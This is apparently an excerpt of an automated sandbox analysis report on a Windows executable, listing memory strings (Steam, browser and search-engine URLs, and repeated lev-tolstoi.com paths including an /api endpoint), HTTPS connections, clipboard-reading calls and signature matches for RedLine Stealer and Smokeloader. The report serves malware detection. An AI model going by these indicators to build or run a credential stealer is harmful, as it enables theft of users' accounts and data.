            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.co
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
            Source: SPFFah2O2q.exe, 00000000.00000003.1613523066.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000527000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1612693637.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1723469776.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000525000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613191723.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613811549.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/;;
            Source: SPFFah2O2q.exe, 00000000.00000003.1613523066.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1585634513.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583828888.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583861132.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1612693637.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1723469776.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1584113176.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613191723.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613811549.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1584143316.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583702027.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/CDaU
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/Conte
            Source: SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000554000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1510014210.000000000053D000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509863915.0000000000553000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1720458759.00000000005B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
            Source: SPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000554000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apiC
            Source: SPFFah2O2q.exe, 00000000.00000003.1533066550.000000000050D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/d
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/https:
            Source: SPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/m/r
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/safe-e
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steamp
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: SPFFah2O2q.exe, 00000000.00000003.1585583635.0000000002F7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49705 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49711 version: TLS 1.2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, | 0_2_004329C0

            System Summary

            Source: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: String function: 00408030 appears 42 times
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: String function: 00414400 appears 65 times
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: String function: 020F8297 appears 72 times
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: String function: 02104667 appears 65 times
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1812
            Source: SPFFah2O2q.exe, 00000000.00000000.1422175290.000000000044F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesDefenca2 vs SPFFah2O2q.exe
            Source: SPFFah2O2q.exe, 00000000.00000003.1430533169.0000000000544000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesDefenca2 vs SPFFah2O2q.exe
